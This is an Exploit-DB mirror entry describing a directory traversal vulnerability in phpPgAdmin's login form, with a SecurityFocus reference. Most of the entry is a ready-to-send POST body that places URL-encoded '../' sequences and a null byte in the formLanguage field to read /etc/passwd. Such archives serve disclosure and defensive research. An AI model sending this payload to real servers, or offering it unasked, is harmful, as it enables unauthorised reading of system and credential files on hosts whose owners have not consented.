exploit-db-mirror/platforms/php/webapps/25938.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

9 lines
No EOL
461 B
Text
Executable file

source: http://www.securityfocus.com/bid/14142/info
phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.
All versions of phpPgAdmin are considered to be vulnerable at the moment.
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login